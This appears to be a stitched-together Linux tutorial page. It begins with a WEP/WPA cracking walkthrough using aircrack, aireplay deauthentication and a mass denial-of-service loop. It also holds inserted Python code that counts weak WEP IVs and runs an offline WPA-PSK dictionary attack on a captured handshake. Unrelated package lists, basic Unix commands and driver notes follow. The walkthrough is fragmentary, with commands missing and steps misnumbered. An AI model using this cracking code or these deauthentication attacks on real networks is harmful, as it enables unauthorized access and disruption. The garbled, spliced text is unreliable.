Installation
WEP Attack
1. For this example, a PrismGT card is used. It is recognized as eth0, but another card may appear as ath0 or something else.
2. Change to monitor mode
# airmon.sh
usage: /usr/local/bin/airmon.sh [channel]
Interface Chipset Driver
eth0 PrismGT prism54
4. Press Ctrl+C. Next we will capture only channel 1 (ESSID HOGE), and specify 1 so that only unique WEP IVs are written. This saves disk space.
1. We will use aireplay to inject packets, so that we can capture packets quickly. Open another console. Copy the BSSID and paste it as follows:
Some access points require clients to reassociate every 20 seconds, otherwise the fake client is considered disconnected. In this case, set up the periodic re-association delay:
2. Once associated, send packets as follows. If you are not associated, you will see no packets being sent.
3. If it stopped sending, you need to associate again. Consider setting up the periodic re-association delay. I used crontab to re-associate over and over.
1. Open a new console and type the following command. Aircrack can read the updated file automatically, so you can run
# aircrack -x -0 out.ivs
2. 104-bit WEP needs about one million IVs. You may need a day or more to capture the packets; however, if you use aireplay to inject, you need only a few hours.
3. This is the result. It needed only a quarter of a million.
4. Aircrack also runs on Windows, but aireplay is not supported there.
1. Once you find the key, shown as XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX, use it to connect to the WLAN.
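The steps above lean on two facts the commands hide: only unique IVs matter (hence the "1" switch to airodump), and the statistical attacks need a large pile of them because only some IV classes leak key material. The following is an added example, not code from the page or from the Aircrack project: it reads a classic pcap of raw 802.11 frames (link type 105, as airodump-style captures), extracts the 3-byte IV and key index from each WEP-protected data frame, counts unique versus repeated IVs, and flags the original FMS "resolved" IVs of the form (A+3, 0xFF, X) by the key byte A they leak. The BSSID, client MAC and frames are constructed inline so it runs offline.

```python
"""Count unique and FMS-weak WEP IVs in a pcap capture (added example, not from the page)."""
import struct
from collections import Counter

LINKTYPE_IEEE802_11 = 105      # raw 802.11 frames, no radiotap/prism header
PCAP_MAGIC = 0xA1B2C3D4

# Constructed addresses; nothing below comes from a real capture.
BSSID = bytes.fromhex("00112233aabb")
CLIENT = bytes.fromhex("00aabbccdd01")
BROADCAST = b"\xff" * 6


def build_pcap(frames, linktype=LINKTYPE_IEEE802_11):
    """Wrap raw frames in a classic little-endian libpcap file (24-byte global header, 16-byte records)."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, linktype)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_pcap_packets(data):
    """Yield (linktype, frame_bytes) for each record of a classic pcap file."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic != PCAP_MAGIC:
        raise ValueError("only little-endian classic pcap files are handled here")
    linktype, = struct.unpack_from("<I", data, 20)
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack_from("<IIII", data, off)
        off += 16
        yield linktype, data[off:off + incl_len]
        off += incl_len


def extract_wep_iv(frame):
    """Return (iv, key_index) for a WEP-protected data frame, else None."""
    if len(frame) < 24 + 4 + 4:                    # header + IV/key-id + ICV is the minimum
        return None
    fc0, fc1 = frame[0], frame[1]
    if ((fc0 >> 2) & 0x3) != 2 or not (fc1 & 0x40):  # data frame with the Protected bit set
        return None
    hdr = 24
    if (fc1 & 0x03) == 0x03:                       # ToDS+FromDS frames carry a fourth address
        hdr += 6
    if fc0 & 0x80:                                 # QoS data subtypes add a 2-byte QoS control field
        hdr += 2
    if frame[hdr + 3] & 0x20:                      # ExtIV bit: TKIP/CCMP header, not a WEP IV
        return None
    return frame[hdr:hdr + 3], frame[hdr + 3] >> 6


def fms_weak_key_byte(iv):
    """FMS 'resolved' IVs (A+3, 0xFF, X) leak key byte A; A = 0..12 for a 104-bit key."""
    if iv[1] == 0xFF and 3 <= iv[0] <= 15:
        return iv[0] - 3
    return None


def summarize_wep_ivs(pcap_bytes):
    total, ivs, weak = 0, Counter(), Counter()
    for linktype, frame in iter_pcap_packets(pcap_bytes):
        total += 1
        if linktype != LINKTYPE_IEEE802_11:
            continue
        found = extract_wep_iv(frame)
        if found is None:
            continue
        iv, _ = found
        ivs[iv] += 1
        key_byte = fms_weak_key_byte(iv)
        if key_byte is not None:
            weak[key_byte] += 1
    return {
        "packets": total,
        "wep_frames": sum(ivs.values()),
        "unique_ivs": len(ivs),
        "duplicate_ivs": sum(n - 1 for n in ivs.values()),
        "weak_by_key_byte": dict(weak),
    }


def make_wep_frame(iv, key_index=0):
    """Constructed ToDS WEP data frame: 24-byte header, IV + key-id byte, dummy ciphertext, 4-byte ICV."""
    hdr = bytes([0x08, 0x41]) + b"\x00\x00" + BSSID + CLIENT + BROADCAST + b"\x10\x00"
    return hdr + bytes(iv) + bytes([key_index << 6]) + b"\x00" * 36 + b"\x00" * 4


def make_beacon():
    """Constructed beacon (management frame): never carries a WEP IV."""
    return bytes([0x80, 0x00]) + b"\x00\x00" + BROADCAST + BSSID + BSSID + b"\x00\x00" + b"\x00" * 16


def make_ccmp_frame():
    """Constructed WPA2 data frame: Protected bit set, but byte 3 of the CCMP header carries ExtIV (0x20)."""
    hdr = bytes([0x08, 0x41]) + b"\x00\x00" + BSSID + CLIENT + BROADCAST + b"\x10\x00"
    return hdr + bytes([0x01, 0x00, 0x00, 0x20, 0, 0, 0, 0]) + b"\x00" * 32


SAMPLE_FRAMES = [
    make_wep_frame(b"\x01\x02\x03"),
    make_wep_frame(b"\x01\x02\x03"),   # IV reuse: these two count as one unique IV
    make_wep_frame(b"\x03\xff\x7a"),   # weak IV for key byte 0
    make_wep_frame(b"\x0f\xff\x01"),   # weak IV for key byte 12
    make_wep_frame(b"\x10\xff\x00"),   # A = 13 would be beyond a 104-bit key: not weak
    make_beacon(),
    make_ccmp_frame(),
]
SAMPLE_PCAP = build_pcap(SAMPLE_FRAMES)


def sample_summary():
    return summarize_wep_ivs(SAMPLE_PCAP)
```

Run it against a real airodump capture by replacing SAMPLE_PCAP with the file contents (captures with a radiotap or prism header need the header skipped first). The FMS class checked here is only a lower bound: the KoreK attacks in Aircrack use many more IV classes, which is why it cracks with far fewer IVs than the original FMS paper needed.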
WPA Attack
1. For this example, a PrismGT card is used. It is recognized as eth0, but another card may appear as ath0 or something else.
2. Change to monitor mode
# airmon.sh
usage: /usr/local/bin/airmon.sh [channel]
Interface Chipset Driver
eth0 PrismGT prism54
4. Press Ctrl+C. Next we will capture only channel 1 (ESSID HOGE). This time capture all packets: do not add the trailing 1 (unique IVs only), because the WPA handshake frames must be saved in full.
2. Deauthentication attack (aireplay -0)
Capture WPA handshakes by forcing clients to reauthenticate. It can also be used to generate ARP requests, as Windows clients sometimes flush their ARP cache when disconnected. This attack is totally useless if there are no associated wireless clients.
After sending the five deauthentication packets, it starts listening for ARP requests with attack 3 (ARP request replay). The -h option is necessary and must be the MAC address of an associated client.
3. Mass denial-of-service (MDOS) attack
With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus
preventing clients from staying connected.
3. If you do not have a handshake packet, you cannot continue, so run aireplay -0 again.
Opening out.cap
Read 154839 packets.
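Why the handshake is indispensable (step 3 above) becomes obvious once you see what the cracker computes: the PSK never crosses the air, only a MIC keyed from it over the EAPOL-Key frames, so a dictionary attack needs the AP and client MACs, both nonces and one MIC'd EAPOL message. The following is an added example, not code from the page or from Aircrack, implementing that check as any WPA-PSK cracker does: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096), PTK via the 802.11i PRF-512, KCK = first 16 bytes, then HMAC-MD5 (WPA/TKIP, key version 1) or HMAC-SHA1-128 (WPA2/CCMP, key version 2) over the EAPOL frame with the MIC field zeroed. The SSID HOGE is the page's; the MACs, nonces, passphrase, wordlist and the message-2 frame are constructed inline, with the "captured" MIC generated from the true passphrase so the example runs offline.

```python
"""Offline WPA/WPA2-PSK dictionary attack on a 4-way handshake (added example, not from the page)."""
import hashlib
import hmac
import struct

# EAPOL hdr(4) + descriptor type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def wpa_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK from PMK, the two MACs and the two nonces; the KCK used for the MIC is PTK[0:16]."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame, key_version):
    """MIC over the whole EAPOL-Key frame with its 16-byte MIC field zeroed."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    if key_version == 1:                                   # WPA / TKIP
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]  # WPA2 / CCMP


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_msg2, key_version, wordlist):
    """Return the passphrase whose derived KCK reproduces the captured MIC, or None."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:                  # WPA passphrase length limits
            continue
        kck = derive_ptk(wpa_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2, key_version), captured_mic):
            return candidate
    return None


def build_eapol_msg2(snonce, mic, key_version):
    """Constructed EAPOL-Key message 2 (client -> AP): RSN descriptor, SNonce, MIC, no key data."""
    key_info = 0x0108 | key_version                        # Pairwise | MIC | descriptor version
    body = (bytes([2]) + struct.pack(">HHQ", key_info, 0, 1) + snonce
            + b"\x00" * 32 + mic + struct.pack(">H", 0))   # zero IV/RSC/ID, MIC, key-data length 0
    return bytes([1, 3]) + struct.pack(">H", len(body)) + body


# Constructed handshake parameters (SSID is the page's; everything else is made up).
SSID = "HOGE"
AA = bytes.fromhex("00112233aabb")      # AP (authenticator) MAC
SPA = bytes.fromhex("00aabbccdd01")     # client (supplicant) MAC
ANONCE = bytes(range(32))               # from message 1; real nonces are random
SNONCE = bytes(range(32, 64))           # from message 2
KEY_VERSION = 2                         # WPA2/CCMP
TRUE_PASSPHRASE = "hogehoge2005"
WORDLIST = ["password", "12345678", "hogehoge2005", "letmein1"]


def build_sample_handshake(passphrase=TRUE_PASSPHRASE):
    """Produce message 2 with a valid MIC, standing in for the frame airodump would have captured."""
    kck = derive_ptk(wpa_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_msg2(SNONCE, b"\x00" * 16, KEY_VERSION)
    return build_eapol_msg2(SNONCE, eapol_mic(kck, unsigned, KEY_VERSION), KEY_VERSION)


def demo():
    return crack_psk(SSID, AA, SPA, ANONCE, SNONCE, build_sample_handshake(), KEY_VERSION, WORDLIST)
```

Each candidate costs 4096 HMAC-SHA1 rounds of PBKDF2, which is the whole reason WPA-PSK cracking is a wordlist game rather than an IV-counting game: no amount of extra traffic helps, only a weak passphrase does, and the PMK is bound to the SSID, so precomputed tables only work per network name.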
Note: In my experience, Aircrack is the best of these tools. Aircrack on Linux supports packet injection, which means we can increase the traffic and need only a few hours to capture sufficient packets. Otherwise you will need several days.
Tool      OS       CPU usage  Encryption  802.11   NIC support  Packet injection  My recommendation
Airsnort  Windows  High       WEP         11b      Few          Not supported     Low (note)
Airsnort  Linux    High       WEP         11b      Few          Not supported     Low (note)
Aircrack  Windows  Low        WEP, WPA    11a/b/g  Many         Not supported     Mid (note)
Aircrack  Linux    Low        WEP, WPA    11a/b/g  Many         Supported!        Recommended!
Contents
3. CVS 1.11.17-6
4. user_mode_linux-2.4.18.36um-0
5. dhcp-3.0PL1-23 (DHCPD)
6. samba-2.0.3-19990228 (SMB)
7. quota-3.06-9
8. ppp-2.3.5 (PPP)
9. vnc-3.3.3r2_x86_linux_2.0 (Virtual Network Computing)
10. nfs-utils-0.3.1-13 (NFS)
11. openldap-1.2.9-6 (LDAP)
12. wu-ftpd-2.4.2b16-4 (FTP)
13. irc-2.9.5(IRC)
14. mgetty-1.1.14 (PPP Server)
15. pbeagent-7.0.0-119 (PowerChute Business Edition Agent)
20. Security & Monitoring
1. aide-0.10-51 (IDS)
2. Aircrack 2.3 (WEP, WPA-PSK Crack)
3. AirSnort 0.2.1a (WEP Crack)
4. snort-2.3.3-2 (NIDS, oinkmaster, ACID)
5. Nmap-3.81-4 (port-scanning)
6. Nessus-2.2.3-3 (Vulnerability scanner)
7. ettercap-NG-0.7.1 (sniffer)
8. etherape-0.9.0 (Network Traffic Browser)
9. ipchains-1.3.10-3 (IP Masquerade & Packet Filtering)
10. iptables-1.3.3-3 (IP Masquerade (NAT), Packet Filtering & Transparent Proxy)
11. MAPS RBL (Realtime Blackhole List)
12. ntop-1.2a12 (Network Monitor)
13. openssh-2.3.0p1-4
14. swatch-2.2 (Monitoring system activity)
15. tcp_wrappers-7.6 (Monitor and filter incoming requests)
16. ethereal-0.8.13-1 (Network protocol analyzer)
21. Kernel Configuration
1. kernel2.4.x
2. Using the ext3 filesystem in 2.4 kernels
22. Links
23. Previous Version's Documents
Basic Commands
1. ls
2. cp
3. mv
4. rm
5. mkdir
6. rmdir
7. cat
8. grep
9. chmod
10. kill
11. passwd
12. man
$ ls
file1 file2 file3
● ls -l
In addition to the name of each file, print the file type, permissions, number of hard links, owner name, group name, size in bytes, and timestamp (the modification time unless other times are selected). For files with a time that is more than 6 months old or more than 1 hour into the future, the times
$ ls -l
total 3
-rw-r--r-- 1 guest users 8 Aug 4 15:56 file1
-rw-r--r-- 1 guest users 8 Aug 5 15:57 file2
-rw-r--r-- 1 guest users 8 Aug 4 15:57 file3
● ls -lt
Sort directory contents by timestamp instead of alphabetically, with the newest files listed first.
$ ls -lt
total 3
-rw-r--r-- 1 guest users 8 Aug 5 15:57 file2
-rw-r--r-- 1 guest users 8 Aug 4 15:57 file3
cp - copy files
$ ls
file1 file2 file3
$ cp file1 file4
$ ls
file1 file2 file3 file4
mv - move or rename files
$ ls
file1 file2 file3 file4
$ mv file4 /tmp
$ ls
file1 file2 file3
$ cd /tmp
[guest@linux /tmp]$ ls
file4
$ ls
file1 file2 file3 file4
$ mv file4 file5
$ ls
file1 file2 file3 file5
rm - remove files
$ ls
file1 file2
$ rm file2
$ ls
file1
$ ls
file1
$ mkdir directory
$ ls -lt
total 2
drwxr-xr-x 2 guest users 1024 Aug 5 11:40 directory/
-rw-r--r-- 1 guest users 8 Aug 4 16:04 file1
$ ls
directory/ file1
$ rmdir directory
$ ls
file1
$ cat file1
101 3people 2-DK
102 none 1-room
201 2people 2-DK
202 4people 3-LDK
$ cat file1
101 3people 2-DK
102 none 1-room
201 2people 2-DK
202 4people 3-LDK
$ cat file2
301 4people 4-DK
302 3people 3-LDK
401 none 2-DK
402 2people 2-DK
$ grep LDK *
file1:202 4people 3-LDK
file2:302 3people 3-LDK
[root@ns public_html]# ls -l
-rw------- 1 hoge staff 163 Aug 7 22:39 index.html
[root@ns public_html]# chmod g+r index.html
[root@ns public_html]# ls -l
-rw-r----- 1 hoge staff 163 Aug 7 22:39 index.html
[root@ns public_html]# chmod 644 index.html
[root@ns public_html]# ls -l
-rw-r--r-- 1 hoge staff 163 Aug 7 22:39 index.html
● EX1)
# ps ax | grep dhcpd
278 ? S 0:00 /usr/sbin/dhcpd
7308 p1 S 0:00 grep dhcpd
# kill 278
# ps ax | grep dhcpd
7310 p1 S 0:00 grep dhcpd
● EX2)
$ passwd
Changing password for guest
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully
man keyword
$ man ls
LS(1) LS(1)
NAME
ls, dir, vdir - list contents of directories
SYNOPSIS
ls [-abcdfgiklmnpqrstuxABCFGLNQRSUX1] [-w cols] [-T cols]
[-I pattern] [--all] [--escape] [--directory] [--inode]
[--kilobytes] [--numeric-uid-gid] [--no-group] [--hide-
control-chars] [--reverse] [--size] [--width=cols] [--tab-
size=cols] [--almost-all] [--ignore-backups] [--classify]
[--file-type] [--full-time] [--ignore=pattern] [--derefer-
ence] [--literal] [--quote-name] [--recursive]
[--sort={none,time,size,extension}] [--format={long,ver-
bose,commas,across,vertical,single-column}]
[--time={atime,access,use,ctime,status}] [--help] [--ver-
sion] [--color[={yes,no,tty}]] [--colour[={yes,no,tty}]]
[name...]
DESCRIPTION
This documentation is no longer being maintained and may
......................................
# /etc/init.d/network restart
Shutting down network interfaces:
eth0 device: Harris Semiconductor D-Links DWL-g650 A1 (rev 01)
eth0 configuration: wlan-bus-pci-0000:02:00.0
done
Shutting down service network . . . . . . . . . . . . .
done.
Hint: you may set mandatory devices in /etc/sysconfig/network/config
Setting up network interfaces:
lo
lo IP address: 127.0.0.1/8
done
eth0 device: Harris Semiconductor D-Links DWL-g650 A1 (rev 01)
eth0 configuration: wlan-bus-pci-0000:02:00.0
SIOCSIFFLAGS: No such file or directory
eth0 (DHCP) . . . . . no IP address yet... backgrounding.
waiting
Setting up service network . . . . . . . . . . . . . .
done.
In /var/log/messages:
So I downloaded the latest firmware for the Linux prism54 driver from http://100h.org/wlan/linux/prismgt/ into /usr/lib/hotplug/firmware/ and renamed it:
# cd /usr/lib/hotplug/firmware/
# wget http://100h.org/wlan/linux/prismgt/1.0.4.3.arm
# mv 1.0.4.3.arm isl3890